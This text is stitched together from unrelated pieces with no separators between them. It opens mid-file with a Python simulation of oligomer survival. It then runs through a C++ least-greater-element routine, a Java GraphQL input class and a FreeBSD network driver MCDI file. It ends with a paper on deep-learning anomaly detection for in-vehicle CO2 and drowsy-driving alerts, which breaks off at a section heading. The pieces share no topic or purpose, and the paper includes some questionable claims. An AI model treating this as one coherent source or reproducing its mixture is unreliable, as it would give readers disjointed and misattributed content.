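P_HYDROLYZE_DUPLEX = 0.05 # duplexes are far more resistant to hydrolysis

random.seed(1)
pool = ["homo"] * 500 + ["chimeric"] * 500  # oligomers formed non-enzymatically

def cycle(pool):
    survivors = []
    for strand in pool:
        p_duplex = P_DUPLEX_HOMO if strand == "homo" else P_DUPLEX_HET
        protected = random.random() < p_duplex
        p_loss = P_HYDROLYZE_DUPLEX if protected else P_HYDROLYZE_SINGLE
        if random.random() > p_loss:
            survivors.append(strand)
    # Hydrolyzed strands are recycled: their monomers re-oligomerize with
    # the same composition statistics as the starting pool (50/50 here).
    n_recycled = len(pool) - len(survivors)
    survivors += random.choices(["homo", "chimeric"], k=n_recycled)
    return survivors

for _ in range(50):
    pool = cycle(pool)

homo_frac = pool.count("homo") / len(pool)
print(f"homogeneous fraction after 50 cycles: {homo_frac:.2f}")  # well above the starting 0.5
```

Even with recycling that regenerates a 50/50 mixture, the differential survival of duplex-protected homogeneous strands steadily enriches the homogeneous fraction, which is the qualitative point of the argument.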
// Replace every element of arr[] with the least greater element on its
// right (-1 if none exists), using a BST built from right to left.
struct Node {
    int data;
    Node *left = nullptr, *right = nullptr;
    Node(int d) : data(d) {}
};

// Insert key into the BST; on the way down, succ tracks the least value
// greater than key (i.e. the in-order successor of key).
Node *insert(Node *root, int key, Node *&succ)
{
    if (root == nullptr)
        return new Node(key);
    if (key < root->data) {
        succ = root; // current node is a candidate least-greater element
        root->left = insert(root->left, key, succ);
    } else {
        root->right = insert(root->right, key, succ);
    }
    return root;
}

void replace(int arr[], int n)
{
    Node *root = nullptr;
    for (int i = n - 1; i >= 0; i--) {
        Node *succ = nullptr;
        root = insert(root, arr[i], succ);
        arr[i] = succ ? succ->data : -1;
    }
}
package com.sunchaser.sparrow.javaee.graphql.domain.bank.input;

import lombok.Data;

import javax.validation.constraints.NotBlank;

/**
 * @author sunchaser <EMAIL>
 * @since JDK8 2022/5/6
 */
@Data
public class CreateBankAccountInput {
    @NotBlank
    private String firstName;
    private Integer age;
}
/*- * Copyright (c) 2010-2011 Solarflare Communications, Inc. * All rights reserved. * * This software was developed in part by <NAME> under contract for * Solarflare Communications, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
*/ #include <sys/cdefs.h> __FBSDID("$FreeBSD: releng/9.3/sys/dev/sfxge/sfxge_mcdi.c 227569 2011-11-16 17:11:13Z philip $"); #include <sys/param.h> #include <sys/condvar.h> #include <sys/lock.h> #include <sys/mutex.h> #include <sys/proc.h> #include <sys/syslog.h> #include <sys/taskqueue.h> #include "common/efx.h" #include "common/efx_mcdi.h" #include "common/efx_regs_mcdi.h" #include "sfxge.h" #define SFXGE_MCDI_POLL_INTERVAL_MIN 10 /* 10us in 1us units */ #define SFXGE_MCDI_POLL_INTERVAL_MAX 100000 /* 100ms in 1us units */ #define SFXGE_MCDI_WATCHDOG_INTERVAL 10000000 /* 10s in 1us units */ /* Acquire exclusive access to MCDI for the duration of a request. */ static void sfxge_mcdi_acquire(struct sfxge_mcdi *mcdi) { mtx_lock(&mcdi->lock); KASSERT(mcdi->state != SFXGE_MCDI_UNINITIALIZED, ("MCDI not initialized")); while (mcdi->state != SFXGE_MCDI_INITIALIZED) (void)cv_wait_sig(&mcdi->cv, &mcdi->lock); mcdi->state = SFXGE_MCDI_BUSY; mtx_unlock(&mcdi->lock); } /* Release ownership of MCDI on request completion. 
*/ static void sfxge_mcdi_release(struct sfxge_mcdi *mcdi) { mtx_lock(&mcdi->lock); KASSERT((mcdi->state == SFXGE_MCDI_BUSY || mcdi->state == SFXGE_MCDI_COMPLETED), ("MCDI not busy or task not completed")); mcdi->state = SFXGE_MCDI_INITIALIZED; cv_broadcast(&mcdi->cv); mtx_unlock(&mcdi->lock); } static void sfxge_mcdi_timeout(struct sfxge_softc *sc) { device_t dev = sc->dev; log(LOG_WARNING, "[%s%d] MC_TIMEOUT", device_get_name(dev), device_get_unit(dev)); EFSYS_PROBE(mcdi_timeout); sfxge_schedule_reset(sc); } static void sfxge_mcdi_poll(struct sfxge_softc *sc) { efx_nic_t *enp; clock_t delay_total; clock_t delay_us; boolean_t aborted; delay_total = 0; delay_us = SFXGE_MCDI_POLL_INTERVAL_MIN; enp = sc->enp; do { if (efx_mcdi_request_poll(enp)) { EFSYS_PROBE1(mcdi_delay, clock_t, delay_total); return; } if (delay_total > SFXGE_MCDI_WATCHDOG_INTERVAL) { aborted = efx_mcdi_request_abort(enp); KASSERT(aborted, ("abort failed")); sfxge_mcdi_timeout(sc); return; } /* Spin or block depending on delay interval. */ if (delay_us < 1000000) DELAY(delay_us); else pause("mcdi wait", delay_us * hz / 1000000); delay_total += delay_us; /* Exponentially back off the poll frequency. */ delay_us = delay_us * 2; if (delay_us > SFXGE_MCDI_POLL_INTERVAL_MAX) delay_us = SFXGE_MCDI_POLL_INTERVAL_MAX; } while (1); } static void sfxge_mcdi_execute(void *arg, efx_mcdi_req_t *emrp) { struct sfxge_softc *sc; struct sfxge_mcdi *mcdi; sc = (struct sfxge_softc *)arg; mcdi = &sc->mcdi; sfxge_mcdi_acquire(mcdi); /* Issue request and poll for completion. 
*/ efx_mcdi_request_start(sc->enp, emrp, B_FALSE); sfxge_mcdi_poll(sc); sfxge_mcdi_release(mcdi); } static void sfxge_mcdi_ev_cpl(void *arg) { struct sfxge_softc *sc; struct sfxge_mcdi *mcdi; sc = (struct sfxge_softc *)arg; mcdi = &sc->mcdi; mtx_lock(&mcdi->lock); KASSERT(mcdi->state == SFXGE_MCDI_BUSY, ("MCDI not busy")); mcdi->state = SFXGE_MCDI_COMPLETED; cv_broadcast(&mcdi->cv); mtx_unlock(&mcdi->lock); } static void sfxge_mcdi_exception(void *arg, efx_mcdi_exception_t eme) { struct sfxge_softc *sc; device_t dev; sc = (struct sfxge_softc *)arg; dev = sc->dev; log(LOG_WARNING, "[%s%d] MC_%s", device_get_name(dev), device_get_unit(dev), (eme == EFX_MCDI_EXCEPTION_MC_REBOOT) ? "REBOOT" : (eme == EFX_MCDI_EXCEPTION_MC_BADASSERT) ? "BADASSERT" : "UNKNOWN"); EFSYS_PROBE(mcdi_exception); sfxge_schedule_reset(sc); } int sfxge_mcdi_init(struct sfxge_softc *sc) { efx_nic_t *enp; struct sfxge_mcdi *mcdi; efx_mcdi_transport_t *emtp; int rc; enp = sc->enp; mcdi = &sc->mcdi; emtp = &mcdi->transport; KASSERT(mcdi->state == SFXGE_MCDI_UNINITIALIZED, ("MCDI already initialized")); mtx_init(&mcdi->lock, "sfxge_mcdi", NULL, MTX_DEF); mcdi->state = SFXGE_MCDI_INITIALIZED; emtp->emt_context = sc; emtp->emt_execute = sfxge_mcdi_execute; emtp->emt_ev_cpl = sfxge_mcdi_ev_cpl; emtp->emt_exception = sfxge_mcdi_exception; cv_init(&mcdi->cv, "sfxge_mcdi"); if ((rc = efx_mcdi_init(enp, emtp)) != 0) goto fail; return (0); fail: mtx_destroy(&mcdi->lock); mcdi->state = SFXGE_MCDI_UNINITIALIZED; return (rc); } void sfxge_mcdi_fini(struct sfxge_softc *sc) { struct sfxge_mcdi *mcdi; efx_nic_t *enp; efx_mcdi_transport_t *emtp; enp = sc->enp; mcdi = &sc->mcdi; emtp = &mcdi->transport; mtx_lock(&mcdi->lock); KASSERT(mcdi->state == SFXGE_MCDI_INITIALIZED, ("MCDI not initialized")); efx_mcdi_fini(enp); bzero(emtp, sizeof(*emtp)); cv_destroy(&mcdi->cv); mtx_unlock(&mcdi->lock); mtx_destroy(&mcdi->lock); }
An Automobile Environment Detection System Based on Deep Neural Network and its Implementation Using IoT-Enabled In-Vehicle Air Quality Sensors: This paper elucidates the development of a deep learning–based driver assistant that can prevent driving accidents arising from drowsiness. As a precursor to this assistant, the relationship between the sensation of sleep deprivation among drivers during long journeys and CO2 concentrations in vehicles is established. Multimodal signals are collected by the assistant using five sensors that measure the levels of CO, CO2, and particulate matter (PM), as well as the temperature and humidity. These signals are then transmitted to a server via the Internet of Things, and a deep neural network utilizes this information to analyze the air quality in the vehicle. The deep network employs long short-term memory (LSTM), skip-generative adversarial network (GAN), and variational auto-encoder (VAE) models to build an air quality anomaly detection model. The LSTM model learns from the data in a supervised manner, while the GAN and VAE models learn in a semi-supervised manner. The purpose of this assistant is to provide vehicle air quality information, such as PM alerts and sleep-deprived driving alerts, to drivers in real time and thereby prevent accidents.

Introduction

Sleep deprivation (drowsiness) and impaired cognition can cause traffic accidents, and the number of traffic accidents due to driver drowsiness and fatigue is increasing annually. According to the Korea Expressway Corporation, 180 out of the 942 highway traffic accident casualties that occurred from 2012 to 2017 were due to drowsy driving. Driver drowsiness is especially dangerous at high speeds, as losing consciousness even for 3 s at 100 km/h will cause the vehicle to travel approximately 100 m with an unconscious driver. Damage from public transport accidents is even more severe.
Driver drowsiness can be caused by conditions such as driver fatigue, lack of sleep, chronic fatigue, and an increased CO2 concentration in the vehicle. Fatigue and headaches during driving are caused not only by health conditions but also by the air quality inside the vehicle, especially when driving for long periods. A major cause of driver drowsiness is lack of ventilation. Therefore, proper ventilation and fresh air recirculation should prevent drowsiness. Previous studies have focused on the development of sensors and algorithm-based technologies to recognize and process driver and environmental conditions. Although camera-based recognition can determine driver drowsiness, its performance depends on the circumstances, and its adoption is limited owing to high costs. Most driver state detection (DSD) technologies adopt methods based on cameras or other sensors, but these devices are difficult to install and may constrain the behavior of drivers. Most in-vehicle DSD systems are also less reliable than rule-based artificial intelligence systems.

Trends in ADAS Research

The progress in autonomous driving technology is drawing considerable attention toward research on ADASs owing to their potential for improving driver safety. To prevent accidents, governments and automakers in countries that promote autonomous driving are expediting the development and adoption of ADASs by mandating their integration. Functions for safe driving (e.g., forward collision warnings), which integrate driver monitoring systems (DMSs) and ADASs, are essential for autonomous cars of Level 3 and above. In autonomous driving, safety is not possible without these technologies. Autonomous vehicles integrate intelligent sensors and information and communication technology with mechanical and traffic technologies to help drivers navigate safely using self-aware systems and judgment control.
Furthermore, they utilize recognition technology for location and obstacle detection, judgment technology that determines the next course of action based on the detection, and control technology that quickly and precisely executes the appropriate action. This approach is being developed further for the next generation of autonomous vehicles and will use in-vehicle sensor hardware integrated with deep learning. In addition, it is important to integrate the aforementioned functions seamlessly into a robust, unified system. Moreover, DMSs have become crucial as it has become necessary to comply with standards such as those enforced by the New Car Assessment Programme (NCAP). Because the European NCAP treats DMSs as primary safety features, the market for DMSs is expected to grow rapidly with the widespread adoption of in-vehicle systems. A DMS analyzes the facial expressions and biometric information of the driver to identify and monitor his or her condition. Infrared camera modules are installed on the steering wheel to track the eyes and face direction of the driver, enabling the system to warn the driver with sound upon detecting drowsiness or squinting. Pressure sensors and vibration actuators are embedded in the seatbelt and seat to monitor the breathing, heart rate, and pulse of the driver. These devices identify drowsiness and provide tactile warnings.

Predicting Driver Drowsiness

There are several techniques for predicting driver drowsiness. In psychophysiological approaches, electronic devices are attached to the skin of the driver to determine his or her condition from biological signals via various methods, including electroencephalography, electrocardiography, electrooculography, and electromyography.
As drowsiness impairs muscle coordination, and consequently the ability to drive, a second approach involves analyzing vehicle operation information to infer the psychophysiological state of the driver. This approach involves analyzing steering wheel movement, driving speed, and degree of lane departure. A third approach for DSD is based on visual information obtained by performing image processing on driver behavior. Portions of the face of the driver are tracked and analyzed to detect signs of drowsiness, such as yawning in the mouth region and eye activity. In relatively recent studies, vehicular operation and visual driver information have been utilized to perform DSD. The visual characteristics (from facial parts such as the eyes and mouth), vehicle operation (to infer the physical characteristics of the driver), and vehicle measurements are analyzed to determine driver drowsiness or distraction level. Representative DSD technologies include facial recognition, heartbeat detection, and lane departure detection. In facial recognition, in-vehicle near-infrared cameras are used to monitor the eye activity of the driver to detect driver fatigue, drowsiness, and poor physical conditions. In this method, facial feature points such as muscles, expressions, and facial direction are extracted, converted into images, and subjected to pattern recognition. However, this approach requires further improvement. Technology that can identify and analyze the biosignals of the driver (e.g., pulse, heart rate, brain blood flow, brain waves, body temperature, sweat, and degree of body load) is emerging. For instance, a slow heart rate may indicate drowsy driving, and the DSD system can alert the driver when the heart rate falls below a threshold. Detection devices are being integrated with various equipment for supplementary tasks such as driver drowsiness and lane departure detection, primarily by automobile and component manufacturers.
The development of a driver monitoring technology that captures, recognizes, and judges driver behavior efficiently through parameters such as steering wheel operation is also advancing. When driving a vehicle, a driver performs basic operations such as adjusting the steering wheel, pushing the accelerator pedal, and checking the mirror. Under reduced focus, the ability of the driver to perform these basic operations is compromised. In lane departure detection, active measures are utilized: for example, a strong vibration is generated in the steering wheel when the vehicle departs from the lane or begins departure without the driver activating the turn signal. If the automobile travels on a lane for a certain period and crosses the left yellow line, or if the steering wheel angle is outside the normal range, the system considers the driver to be drowsy and generates a warning. A built-in drowsiness prevention system activates the lane departure warning system along with the brakes, as well as a complementary warning when the automobile is too close to the vehicle in front. This technology also includes a function to shorten the brake system deployment time automatically to avoid collisions. Under mild drowsiness, the system only provides voice assistance. However, if an extreme situation such as deep drowsiness or fainting is identified, the system not only provides voice assistance but also vibrates the seat to wake up the driver to prevent an accident. Likewise, when the vehicle departs from the lane, the pedal vibrates to warn the driver. In similar dangerous situations, the Pre-Safe seat belt tightens two or three times. Hence, the vehicle systems can actively intervene to reduce the risk of an accident.

Effect of CO2

Several studies have indicated that air quality is better inside vehicles than outside.
However, the California Air Resources Board reported that the amounts of hydrocarbons and CO2 within the vehicle are at least two to ten times those outside the vehicle. Furthermore, some areas, such as China and Hong Kong, are highly affected by particulate matter (PM). When the dust level is severe, it has been reported that in-vehicle air conditioning systems are operated without external ventilation. In particular, if the in-vehicle filter is not replaced at an appropriate time, the air quality becomes worse inside the vehicle than outside it because of the accumulation of CO2 inside the vehicle. In this regard, the situation in Korea is similar to that in China and Hong Kong. Accordingly, in Korea, indoor air quality is regulated through the Indoor Air Quality Control Act. The contaminants to be managed are as follows: particulate matter (PM10 and PM2.5), carbon dioxide (CO2), formaldehyde, total airborne bacteria, carbon monoxide (CO), nitrogen dioxide (NO2), radon (Rn), volatile organic compounds (VOCs), asbestos, ozone, mold, benzene, toluene, ethylbenzene, xylene, and styrene. According to the management standards, the concentrations of PM10, PM2.5, CO2, and CO should be less than 100 µg/m3, 50 µg/m3, 1000 ppm, and 10 ppm, respectively. In accordance with Korean laws and standards, the criteria for toxic indoor pollutants and poor air quality were also specified in this study. In addition, when the air filter is not replaced regularly or when the external concentration of PM is high during a certain period, which can be the case in Korea, the CO2 concentration in the vehicle increases rapidly when the internal circulation mode is utilized.
The factors affecting the air quality inside automobiles can be divided into external pollutants, such as outside air, exhaust fumes emitted from other vehicles, odors from factories and agricultural lands, and dust from tires and roads, and internal pollutants, such as CO2 from respiration and VOCs produced by the interior components of the vehicle (Figure 1). In addition, new cars generally have extremely high formaldehyde contents.
The concentrations of pollutants from vehicle exhausts are higher inside the vehicle than those outside. It is difficult to lower the windows to ventilate the car while driving on urban streets. However, if the air conditioning system is used only in the internal circulation mode, CO2 from respiration will cause O2 depletion, causing fatigue and impaired muscle coordination and judgement, which is ultimately manifested as drowsiness. Medical journals and industrial safety studies have indicated that the level of CO2 affects sleepiness and fatigue, but more research is needed on the direct causal relationship between CO2 and sleepiness. According to data published by the Korea Road Traffic Authority, when the occupancy of an express bus is 70%, the average CO2 concentration in the vehicle is 3422 ppm, with a maximum of 6765 ppm after 90 min of driving. If the CO2 concentration exceeds 2000 ppm, the driver may experience a headache or drowsiness. A concentration exceeding 5000 ppm will drastically reduce the O2 level and cause brain injury. Concurring with these findings, in 2012, the American Association of Occupational Health published a study on drowsy driving that indicated that if the CO2 concentration in a confined space exceeds 2000 ppm, the occupants may experience headaches or drowsiness. The potential health problems associated with high CO2 concentrations are listed in Table 1.
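The CO2 bands quoted above (the 1000 ppm indoor standard, headache/drowsiness beyond 2000 ppm, severe O2 reduction beyond 5000 ppm) map naturally onto a rule-based alert. The following minimal Python sketch uses only the quoted boundaries; the band names and function name are invented for illustration:

```python
def co2_alert(ppm: float) -> str:
    """Map a cabin CO2 reading (ppm) to an alert band.
    Band boundaries follow the figures quoted in the text; the band
    names themselves are illustrative."""
    if ppm >= 5000:
        return "critical: severe O2 reduction risk, ventilate immediately"
    if ppm >= 2000:
        return "warning: headache/drowsiness likely, recommend ventilation"
    if ppm >= 1000:
        return "notice: above the 1000 ppm indoor standard"
    return "ok"

# The 3422 ppm and 6765 ppm values are the express-bus figures quoted above.
for level in (800, 1500, 3422, 6765):
    print(level, "->", co2_alert(level))
```

A production system would add hysteresis so the alert does not flap when a reading hovers near a boundary.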
Air Quality Sensor (AQS)

If an automobile is driven for a long time, the amount of CO2 in its cabin will increase and O2 will be depleted owing to respiration. O2 depletion, in turn, causes fatigue and drowsy driving. Hence, CO2 causes fatigue, reduces O2 levels, and impairs driver muscle coordination and judgement. Thus, to improve fatigue prevention techniques, an autonomous system to monitor air pollution in vehicles during journeys and to improve air quality is needed. In recent years, various studies have been conducted to develop technologies for filtering harmful substances and odors, including general air pollutants, vehicle exhaust gases, and VOCs, from automobiles. However, these filter systems have design limitations. High-end automobiles are equipped with air conditioners that monitor the CO2 level in the cabin, recirculate fresh air, and provide a warning when a certain CO2 level is exceeded. These air conditioners have been upgraded to regulate PM. When a high concentration of PM is detected in the vehicle, the air inside the vehicle is discharged, and fresh air is sucked in, filtered, and recirculated throughout the vehicle by the improved air conditioning system.
Such technologies are already under development. For example, compact integrated air quality sensors (AQSs) for monitoring indoor air pollution, PM2.5 concentration sensors, surface treatment technology for microbial habitat (mold) suppression, disinfectors in air conditioning system components (such as heat exchangers) and cluster ionizers for air purification, generator technology, cabin filter replacement notification devices, and integrated air conditioning systems, such as multi-function air cleaners, are being developed. We developed an IoT-enabled vehicle AQS for measuring the concentrations of CO2, PM, and other pollutants. Furthermore, based on sensor measurements, we devised a DSD system for drowsy driving accident prevention. For the AQS, we collected information from five types of sensors (CO, CO2, PM, temperature, and humidity sensors) with the performance specifications summarized in Table 2. The measured value depends on the operating temperature. We aimed to develop a system and service that can recognize and monitor various problems that may occur during vehicle operation, such as driver drowsiness due to CO2, hazardous in-vehicle PM levels, hazardous gas leakage, and fire hazards.

[Table 2 excerpt, CO2 sensor: type: NDIR (nondispersive infrared) sensor; measurement range: 0-5000 ppm; accuracy: ±75 ppm or 10% of reading (whichever is greater) over 400-5000 ppm; operating temperature: +10 to +50 °C.]

*PM (particulate matter) with an aerodynamic diameter equal to or less than 2.5 µm is referred to as PM2.5, PM with a diameter between 2.5 and 10 µm is referred to as PM10, and PM with a diameter less than 1.0 µm is defined as PM1.

IoT Sensor Platform

In this research, we integrated an AQS with the IoT. The purpose of the IoT is to use connected technologies to develop a "smarter" environment, enabling lifestyle simplification by saving time, energy, and money. Through this technology, industries can reduce expenditures.
The enormous investments and several studies conducted on the IoT have made it an increasing trend in recent years. The IoT involves a set of connected devices that can transfer data among themselves to optimize their performance. These actions occur automatically and without human awareness or input. The IoT sensor platform (Figure 2) includes four main components: 1) sensors, 2) processing networks, 3) data analysis, and 4) system monitoring. Modern IoT-enabled sensor solutions analyze collected data, perform real-time analysis, and provide timely notifications of the sensor status based on measurements, to increase managerial and response efficiencies. Key technologies such as deep learning and distributed parallel processing are used to analyze patterns in the collected data and to detect anomalies in real time. Pre-trained deep learning solutions can accurately monitor driver health and detect operational anomalies for all types of sensors. AI-based sensor solutions can reduce operational and managerial costs. In fact, unnecessary support for system checks can be reduced using these solutions. Moreover, sensor data compensation technology can be used to improve the performance of low-cost sensors, reach a level of precision similar to those of expensive precision instruments, and reduce the initial investment, especially for large sensors.
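As an illustration of how the four components could fit together, the following stdlib-only Python sketch mimics one pass through such a pipeline. The payload schema, device name, function names, and threshold values are all invented for illustration and are not the actual system:

```python
import json
import time

def read_sensors() -> dict:
    """Stand-in for the five-sensor AQS (component 1); real hardware
    reads would go here. Values are invented for illustration."""
    return {"co": 1.2, "co2": 2450.0, "pm2_5": 18.0,
            "temp_c": 24.5, "humidity_pct": 41.0}

def to_payload(reading: dict, device_id: str) -> str:
    """Serialize a reading for transmission to the server (component 2,
    the processing network)."""
    return json.dumps({"device": device_id,
                       "ts": int(time.time()),
                       "reading": reading})

def analyze(payload: str) -> list:
    """Server-side analysis step (components 3 and 4): flag readings
    that exceed illustrative limits so monitoring can raise an alert."""
    limits = {"co2": 2000.0, "co": 10.0, "pm2_5": 50.0}
    reading = json.loads(payload)["reading"]
    return [k for k, lim in limits.items() if reading[k] > lim]

alerts = analyze(to_payload(read_sensors(), "cabin-01"))
print(alerts)  # ['co2'] for the sample reading above
```

In the actual platform, the analysis step is a deep learning model rather than fixed thresholds; this sketch only shows the data flow.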
Deep Learning-Based Sensors

The IoT and "smart cities" are generating substantial amounts of time-series sensor data for analysis. The importance of sensors has been further highlighted in smart mobility for autonomous vehicles, which have witnessed active research and development.
Automotive original equipment manufacturers (OEMs), semiconductor firms, AI companies, and software startups have driven the rapid development of related technologies and platforms. Sensors are key components of automobiles, similar to their role in all products of highly interconnected technology-intensive industries. Research on AI, computer vision, and sensor networks is helping to reduce driver and pedestrian accidents in some countries, increasing the adoption of technology to enhance safety. Extensive research is being conducted on deep learning to enable computers to determine optimal algorithms via artificial neural networks that resemble human neural networks using large volumes of data. Deep learning is a popular machine learning approach that has achieved significant progress in all traditional machine learning fields. Deep learning techniques are becoming indispensable in autonomous driving, for tasks such as the recognition of people, cars, and lanes surrounding autonomous vehicles. In fact, deep learning can handle the numerous variables in a driving environment that otherwise hinder the development of conventional algorithms. In the same vein, real-time, high-performance semantic segmentation based on deep learning for driving environment recognition has been developed successfully. For instance, SegNet is a system that visually monitors the status of the driver and identifies characteristics such as pupil status, eye blinking, and gaze via deep learning algorithms. Facial landmark information allows SegNet to analyze the head pose and gaze to identify the awareness level of the driver. Moreover, deep learning has been used to process important in-vehicle sensor data. In addition, the use of sensors has recently increased in various fields, such as anomaly detection, whose principles can be applied to DSD. In the following sections, we discuss three deep learning algorithms used in sensing systems for anomaly detection.
Deep Learning-Based Anomaly Detection

The identification of items or patterns in a dataset that do not conform to other items or an expected pattern is referred to as anomaly detection. These unexpected patterns may be called anomalies, outliers, novelties, exceptions, noise, surprises, or deviations. Anomaly detection reveals unexpected patterns in the data. Further, it is widely used in various fields, including fraud detection, intrusion detection, safety-critical systems, health monitoring, detecting illegal use of credit cards, detecting ecosystem disturbances, and military surveillance. Moreover, it can be used in preprocessing to remove outliers from datasets, which can significantly improve the performance of subsequent machine learning algorithms, especially in supervised learning tasks. Sensor networks are an emerging research topic, and it is difficult to collect error-free information from wireless sensors. Anomaly detection is particularly important for sensor networks from a data analysis perspective because of their special features. An abnormal value in sensor network data indicates either that the sensor has correctly identified an abnormal event or that there is a problem in the sensor itself. Thus, sensor network anomaly detection covers both sensor malfunctions and intrusions. The types of data collected by sensors vary widely and include binary, discrete, continuous, voice, and video data, which are continuously generated. Data may be noisy or missing, depending on the environment in which the sensor is installed. Sensor network anomaly detection poses many challenges because it must function in real time. Because sensors are installed in multiple locations, a distributed data mining approach is required for analysis. Noise and missing values must be distinguished from outliers. Anomaly detection has also been studied using in situ data with respect to time. The problem of abnormality detection in time-series data is as follows.
Time-series data form a continuous series of data points in temporal order, and the value at a specific point in time is strongly affected by the preceding and following values. In general, the analysis is conducted by selecting an appropriate time window, chosen according to whether the objective is to find an abnormal point in the time series or an abnormal pattern of change. A label indicates whether or not a data entity is abnormal. Labeling training material (i.e., to enable classification) incurs tremendous effort and cost, and it is substantially difficult to cover all possible types of anomalies. If an abnormality appears rarely, or if a new type of abnormality emerges, it is difficult to obtain labeled data entities for it. Therefore, it is necessary to deal with unlabeled data. Many challenges distinguish anomaly detection from a binary classification task. For example, because anomalous systems exhibit considerably more diverse behaviors than normal systems and anomalies are rare by nature, anomalous data are often severely underrepresented in training sets. There are three broad categories of anomaly detection techniques, based on the extent to which labeled data are available: supervised, semi-supervised, and unsupervised. In supervised anomaly detection, a binary (abnormal/normal) labeled dataset is given, and a binary classifier is trained on it. This approach must address the imbalanced-dataset problem resulting from the scarcity of abnormally labeled data points. Semi-supervised anomaly detection techniques require a training set that contains only normal data points. Anomalies are detected by building a model of the system's normal behavior and then testing the likelihood that the learned model would generate the test data point.
Unsupervised anomaly detection techniques deal with unlabeled datasets by making the implicit assumption that most data points are normal. Supervised anomaly detection is used when label information is available for all entities in the training material; a classification model is then learned to determine anomalies, and this is the most common approach. Generally, the data are imbalanced, with the abnormality rate negligible compared to the normal rate. Semi-supervised anomaly detection is used when label information is available for only part of the training material and the normality/abnormality status of the unlabeled part is unknown; generally, the model is trained using only normal data and is then applied to the test data. Unsupervised anomaly detection is the most widely used method for unlabeled data. In this method, outlier detection is based mainly on the distances between the entities in the data, and it is generally assumed that the proportion of normal data is overwhelmingly large; if this assumption is wrong, problems such as high false-alarm rates occur. When a labeled dataset can be generated by relating historical data and sensor data over time (i.e., when the data samples from sensors are labeled as normal or abnormal states), representative patterns in the measured values can be determined. Labeled data and deep learning models then enable computers to learn patterns from sensor measurements by supervised learning. However, supervised learning cannot be used in the initial stage (for example, when a sensor is first installed or when no historical data are available). In these cases, unsupervised learning is adopted to monitor the sensor state, as it does not require labeled data. In unsupervised learning, anomalies such as sensor failures can be determined directly from measurements without relying on historical data.
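The distance-based idea behind unsupervised outlier detection can be illustrated with a minimal sketch (Python is used purely for illustration; the k-nearest-neighbor distance score and the 3×-mean threshold are our assumptions, not the paper's exact method):

```python
def knn_outlier_scores(points, k=2):
    """Score each point by its mean distance to its k nearest neighbors.

    Under the usual unsupervised assumption that most points are normal,
    points far from their neighbors receive high scores and are flagged
    as candidate outliers.
    """
    scores = []
    for i, p in enumerate(points):
        dists = sorted(abs(p - q) for j, q in enumerate(points) if j != i)
        scores.append(sum(dists[:k]) / k)
    return scores

readings = [20.1, 20.3, 19.8, 20.0, 35.0]  # one obviously deviant reading
scores = knn_outlier_scores(readings)
# Flag points whose score is far above the average score (assumed rule)
outliers = [i for i, s in enumerate(scores) if s > 3 * (sum(scores) / len(scores))]
```

Because the method assumes most points are normal, the single deviant reading receives a far larger score than the rest and crosses the threshold; if that assumption fails, false alarms rise, as noted above.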
The deep learning model can later be enhanced with labeled data for more systematic processing of sensor measurements. In general, unsupervised anomaly detection algorithms provide similarity scores between measurements and normal data and indicate anomalies based on a threshold. Unsupervised learning facilitates the detection of abnormal patterns in periodic data, as most sensors exhibit periodic measurement behaviors. By using a generative model, it is possible to take a periodic pattern as input and generate synthetic data for one cycle in the form of a probability distribution. The generative adversarial network (GAN) and the variational auto-encoder (VAE) are common generative models for synthesizing sensor data from a given process.
Long Short-Term Memory (LSTM) Model
To prevent the loss of historical data and to leverage such data, long short-term memory (LSTM) has been used extensively owing to its promising results. Instead of simply accumulating historical information, LSTM introduces cell states and gate structures to select and deliver important information. The cell state contains the information obtained in the previous step. Rather than simply passing this information to the next step, the forget and input gates determine how much information will be discarded and how much of the new input will be reflected when updating the cell state. LSTM networks have proven well suited for handling and predicting important events with long intervals and delays in a time series, because they can maintain long-term memory. In an LSTM network, stacked LSTM hidden layers make it possible to learn high-level temporal features without the fine tuning or preprocessing that other techniques require. Data collected from a sensor are used to train the LSTM model, which is then used to estimate the sensor measurement values in real time.
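A minimal sketch of this predict-and-compare loop follows; an exponential moving average stands in for the trained LSTM predictor, and the smoothing factor and threshold are illustrative assumptions:

```python
def residual_anomalies(series, alpha=0.5, threshold=5.0):
    """Flag points whose residual |measured - predicted| exceeds a threshold.

    An exponential moving average stands in for the trained LSTM here:
    both produce a one-step-ahead prediction from past values, and the
    residual error against the actual measurement drives detection.
    """
    anomalies = []
    pred = series[0]
    for t, actual in enumerate(series[1:], start=1):
        if abs(actual - pred) > threshold:
            anomalies.append(t)
        pred = alpha * actual + (1 - alpha) * pred  # update predictor state
    return anomalies

# A steady signal with one sudden jump at index 5
signal = [20, 21, 20, 22, 21, 60, 21, 20]
anomalies = residual_anomalies(signal)
# Both the jump and the return to normal are flagged as sudden changes
```

As in the residual-error approach described here, a steady sensor yields small residuals, while sudden changes produce large ones.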
LSTM is a deep learning model suitable for modeling time-series data such as sensor measurements. To predict the value at time t, the structure uses the data at instants (t − n), (t − n + 1), . . . , (t − 1), for some n, as input. LSTM can model the autocorrelation of time-series data without requiring the assumption of stationarity and can learn the temporal patterns of the series. Xie et al. trained an LSTM model with data collected by a sensor and used the trained model to estimate the sensor measurements in real time. For a sensor in a steady state, there is little difference (residual error) between the values estimated by the LSTM model and the actual measured values; this residual error can therefore be used to detect anomalous points. Experiments with actual IoT sensor data have indicated that anomaly detection using LSTM efficiently detects sudden changes in values.
Skip-GANs and VAEs
